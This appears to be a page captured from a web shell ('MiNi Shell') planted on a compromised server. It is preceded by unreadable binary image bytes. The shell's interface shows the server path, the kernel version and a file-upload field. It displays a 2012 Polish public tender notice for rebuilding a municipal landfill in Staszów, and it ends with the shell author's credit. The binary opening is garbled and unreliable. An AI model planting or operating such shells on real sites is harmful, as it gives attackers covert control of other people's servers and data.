JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120316/82010-N-2012.html

<p class="kh_header"><b>Staszów: Przebudowa składowiska odpadów komunalnych Pocieszka w Staszowie.</b><br>
<b>Numer ogłoszenia: 82010 - 2012; data zamieszczenia: 16.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej w Staszowie Spółka Gminy z o.o. , ul. Wojska Polskiego 3, 28-200 Staszów, woj. świętokrzyskie, tel. 015 8642641, faks 015 8642643.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.staszow.pgkim.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa składowiska odpadów komunalnych Pocieszka w Staszowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa składowiska odpadów komunalnych Pocieszka w Staszowie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.21.10-3, 45.11.12.00-0, 45.20.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy  Wykonawca  zobowiązany  jest  zabezpieczyć  swą  ofertę  wadium  w  wysokości:  25 000,00  PLN  ,              
( słownie wadium: dwadzieścia pięć tysięcy 00/100 złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia. 
       Wymagane jest wykazanie przez wykonawcę realizacji co najmniej 1 zamówienia obejmującego roboty budowlane  w  zakresie  ochrony  środowiska,  której  przedmiotem  była  budowa  lub  rozbudowa,  lub przebudowa   obejmująca   roboty   ziemne   dotyczące   składowisk   odpadów,   zbiorników   ziemnych,            
w  okresie  ostatnich  trzech  lat  przed  upływem  terminu  składania  ofert,  a  jeżeli  okres  prowadzenia działalności jest krótszy - w tym okresie o wartości nie mniejszej niż 1 000 000 PLN netto ( bez VAT). W  przypadku  wspólnego  ubiegania  się  o  zamówienie  kilku  wykonawców,  liczone  będzie  ich  łączne doświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wskaże  do  wykonania  niniejszego  zamówienia  wykaz  osób  które  będą uczestniczyć  w  wykonywaniu zamówienia,  wraz  z  informacjami  na  temat  ich  kwalifikacji zawodowych,  doświadczenia i  wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności: 
 
a) Kierownik Budowy - mający co najmniej 5 lat doświadczenia zawodowego w kierowaniu robotami  budowlanymi  przy  co  najmniej  dwóch  robotach  budowanych  o  wartości  robót  co najmniej 1 000 000 PLN netto ( bez VAT) , posiadający uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej  zgodnie  z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2003 r., Nr 207, poz. 2016 z późn. zm.), lub odpowiadające im   ważne   uprawnienia   budowlane,   które   zostały   wydane   na   podstawie   wcześniej 
obowiązujących  przepisów.  Przez  doświadczenie  zawodowe  należy  rozumieć  okres  od  daty uzyskania uprawnień do daty ukazania się ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych, przynależność do właściwej izby samorządu zawodowego. 
b) Kierownik Robót Sanitarnych - mający co najmniej 5 lat doświadczenia zawodowego w kierowaniu robotami budowlanymi przy co najmniej dwóch robotach budowanych, posiadający uprawnienia  budowlane    w  specjalności  instalacyjnej  w  zakresie  sieci,  instalacji  i  urządzeń cieplnych,  wentylacyjnych,  gazowych,  wodociągowych  i  kanalizacyjnych  bez  ograniczeń zgodnie  z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2003 r., Nr 207, poz. 2016 z późn. zm.) lub odpowiadające im waSne uprawnienia budowlane, które zostały wydane na podstawie  wcześniej  obowiązujących  przepisów.  Przez  doświadczenie zawodowe  należy rozumieć  okres  od  daty  uzyskania  uprawnień  do  daty  ukazania  się  ogłoszenia  o  niniejszym zamówieniu w Biuletynie Zamówień Publicznych, przynależność do właściwej izby samorządu zawodowego. 
c)Kierownik   Robót   w   branży   elektroenergetycznej      -   mający   co   najmniej   5   lat doświadczenia  zawodowego  w  kierowaniu  robotami budowlanymi  przy  co  najmniej  dwóch robotach  budowanych,  posiadający  uprawnienia  do  kierowania  robotami  budowlanymi  w specjalności  elektroenergetycznej  bez  ograniczeń    zgodnie    z  ustawą  z  dnia  7  lipca  1994  r. Prawo budowlane (Dz. U. z 2003 r., Nr 207, poz. 2016 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.  Przez  doświadczenie  zawodowe  należy  rozumieć  okres  od  daty  uzyskania uprawnień do daty ukazania się ogłoszenia o niniejszym zamówieniu  w Biuletynie Zamówień Publicznych, przynależność do właściwej izby samorządu zawodowego. 

Przedstawi oświadczenie potwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia wydane na podstawie ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 
2003 r., Nr 207, poz. 2016 z późn. zm.) oraz Rozporządzenia Ministra Transportu i Budownictwa z dnia 28  kwietnia  2006  r.  w  sprawie  samodzielnych  funkcji  technicznych  w  budownictwie  lub  wcześniej obowiązujących  przepisów.  Mogą  to  być  również    dokumenty  potwierdzające  kwalifikacje  zawodowe uprawniające   do   wykonywania   samodzielnych   funkcji   technicznych   w   budownictwie   wydane obywatelom   państwa   członkowskich   Unii   Europejskiej,   Konfederacji   Szwajcarskiej   lub   państw członkowskich  Europejskiego Porozumienia  o  Wolnym  Handlu  EFTA-stron  umowy  o  Europejskim Obszarze Gospodarczym, z zastrzeżeniem art.12a i innych przepisów ustawy Prawo budowlane (Dz. U. z 2003 r., Nr 207, poz. 2016 z późn. zm.),oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U. z 2008 r. ,Nr 63,poz.394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  szczególności  Wykonawca  winien  (w  przypadku  wspólnego  ubiegania  się  dwóch  lub  więcej Wykonawców   o   udzielenie   niniejszego   zamówienia,   oceniana   będzie   ich   łączna   sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku):  
posiadać  środki  finansowe  lub  zdolność  kredytową  w  wysokości  co  najmniej  1000 000    PLN  (słownie: jeden milion  złotych). W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć  informację  z  banku  lub  spółdzielczej  kasy  oszczędnościowo-kredytowej,  wystawioną  nie wcześniej  niS  3  miesiące  przed  upływem  terminu  składania  ofert,  w  którym  posiadają  rachunek, potwierdzające   posiadanie   środków   finansowych   w   wymaganej   wysokości   lub   posiadanie   przez Wykonawcę zdolności kredytowej w wymaganej wysokości. Jeżeli wykonawca, wykazując spełnianie tego warunku  polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 
2b  ustawy,  wymaga  się  przedłożenia  informacji  z  banku  lub  spółdzielczej  kasy  oszczędnościowo-kredytowej dotyczącej tych podmiotów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany  umowy  mogą  być  dokonywane  jedynie  w  sposób  zgodny  z  przepisami  Ustawy  Prawo  Zamówień 
Publicznych (art. 144) i mogą być wprowadzane w przypadku: 
1)    konieczności  dokonania  zmian  projektowych,  które  są  niezbędne  dla  prawidłowego  wykonania przedmiotu  umowy,  wprowadzanych  w  trybie  nadzoru  autorskiego  przeprowadzonego  zgodnie  z przepisami Prawa Budowlanego lub usuwania błędów w tej dokumentacji; 
2)    zmiany w zakresie i wykonywaniu robót, wynikające z przeprowadzonych ekspertyz wskazujących na konieczność zmian sposobu wykonywania robót, 
3)    zmiany,  za  zgodą  Zamawiającego,  zwiększenia  wartości  umowy,  w  przypadku  gdy  konieczność wzrostu  wartości  umowy  będzie  wynikać  z  istotnych  okoliczności  mających  wpływ  na  prawidłowe wykonanie przedmiotu umowy. 
4)    Ponadto  Zamawiający  przewiduje  możliwość  wprowadzania  zmian  w  przypadku  wystąpienia  co najmniej jednej  z  okoliczności  wymienionych poniżej,  z uwzględnieniem   podawanych  warunków  ich wprowadzenia:   
A)   Zmiana terminu wykonania umowy: 
A1.   Zmiany   spowodowane   warunkami   atmosferycznymi,   geologicznymi,   archeologicznymi,   w szczególności: 
klęski żywiołowe; 
warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: temperatury powietrza poniżej 00C, wiatr uniemożliwiający pracę maszyn budowlanych, gwałtowne opady deszczu (oberwanie chmury), gradobicie, burze z wyładowaniami atmosferycznymi, 
 niewypały i niewybuchy; 
 wykopaliska archeologiczne; 
 odmienne od przyjętych w dokumentacji przedstawionej przez Zamawiającego  warunki geologiczne (kategorie gruntu, kurzawka, głazy narzutowe itp.); 
A2. Zmiany będące następstwem okoliczności leSących po stronie Zamawiającego, w szczególności: 
  nieterminowe przekazanie terenu budowy przez Zamawiającego; 
  wstrzymanie robót przez Zamawiającego; 
  wykonanie przez Zamawiającego robót budowlanych lub dostaw bez realizacji których Wykonawca 
nie  może  w  sposób  należyty  wykonywać  przedmiotu  umowy,  z przekroczeniem  terminów wskazanych dla wykonania tych robót lub dostaw; 
 konieczność usunięcia błędów lub wprowadzenia zmian w  dokumentacji umowy, w szczególności w projekcie budowlanym;  
A3.Zmiany będące następstwem działania organów administracji, w szczególności: 
  przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień itp.; 
 odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji dostarczonej przez Zamawiającego; 
A4.   Inne   przyczyny   zewnętrzne   niezależne   od   Zamawiającego   oraz   Wykonawcy   skutkujące niemożliwością prowadzenia prac w szczególności: 
 brak  możliwości  dojazdu  oraz  transportu  materiałów  na  teren  budowy  spowodowany  awariami, remontami lub przebudowami dróg dojazdowych; 
 protesty mieszkańców; 
B)   Zmiana sposobu spełnienia świadczenia umowy: 
B1.Zmiany technologiczne, w szczególności: 
  niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji umowy, w szczególności w projekcie budowlanym, a spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń; 
  pojawienie   się   na   rynku   materiałów   lub   urządzeń   nowszej   generacji   pozwalających   na zaoszczędzenie  kosztów  realizacji  przedmiotu  umowy  lub  kosztów  eksploatacji  wykonanego przedmiotu umowy; 
  pojawienie   się   nowszej   technologii   wykonania   zaprojektowanych   robót   pozwalającej   na zaoszczędzenie czasu realizacji umowy lub kosztów wykonywanych robót, jak również kosztów eksploatacji wykonanego przedmiotu umowy, 
  konieczność        zrealizowania        umowy        przy        zastosowaniu     innych        rozwiązań technicznych/technologicznych  lub  materiałowych  niż  wskazane  dokumentach  umowy,  w szczególności  w  projekcie  budowlanym  ,  w  sytuacji,  gdyby  zastosowanie  przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem umowy, 
  odmienne   od   przyjętych   w   dokumentacji   umowy   warunki   geologiczne   (kategorie   gruntu, kurzawka,   głazy   narzutowe   itp.)   skutkujące   niemożliwością   zrealizowania   umowy   przy dotychczasowych założeniach technologicznych; 
 odmienne od przyjętych w dokumentacji umowy warunki terenowe,  
 konieczność  zrealizowania  umowy  przy  zastosowaniu  innych  rozwiązań  technicznych  lub materiałowych ze względu na zmiany obowiązującego prawa,  
B2. Zmiany osobowe: 
  zmiana  osób,  będących  personelem  Wykonawcy  wskazanym  w  Ofercie,  przy  pomocy  których Wykonawca  realizuje  przedmiot  umowy, na  inne  legitymujące  się  co  najmniej  równoważnymi uprawnieniami, na zasadach określonych w niniejszej umowie; 
 zmiana   Podwykonawcy,   przy   pomocy   którego   Wykonawca   wykonuje   umowę   na   innego dysponującego  co  najmniej  porównywalnym doświadczeniem,  potencjałem  technicznym  i osobowym.  Zmiana  ta  nie  może  dotyczyć czynności,  które  zgodnie  z  umową  muszą  być wykonane przez Wykonawcę osobiście.  
2. Wszystkie powyższe postanowienia stawia katalog zmian na które Zamawiający może wyrazić zgodę,ale nie stanowią zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.pgkim.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej 
w Staszowie Spółka Gminy z o.o.  
28-200 STASZÓW, ul Wojska Polskiego 3 pok. 25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2012 godzina 10:00, miejsce: Przedsiębiorstwo  Gospodarki Komunalnej i Mieszkaniowej w Staszowie Spółka Gminy z o.o., 28-200 Staszów, ul. Wojska Polskiego 3, sekretariat II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com